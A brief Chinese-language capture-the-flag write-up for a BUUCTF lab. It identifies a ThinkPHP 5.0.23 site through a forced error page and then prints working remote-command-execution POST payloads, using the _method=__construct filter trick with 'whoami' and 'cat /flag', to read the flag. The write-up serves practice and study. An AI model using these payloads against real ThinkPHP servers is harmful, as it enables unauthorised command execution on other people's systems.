首先打开网站一看,映入眼球,thinkphp,但是不知道是什么版本的所以就想办法构造一个报错来让它显示一些更详细的信息
http://59429912-fc6a-4d2d-945a-c1aabf47f19f.node3.buuoj.cn/?s=3
这样就可以看到thinkphp的版本了是5.0.23版本接下来就简单了求助度娘,查找thinkphp5.0.23对应版本的漏洞最后在网上找到了这样一篇,thinkphp5.0.23的远程命令执行的漏洞。
之后就可以尝试这个RCE漏洞是否可以执行
直接利用hackbar进行post传参,内容如下
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
发现可以,那就直接利用cat /flag查看flag,构造payload
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /flag
得到flag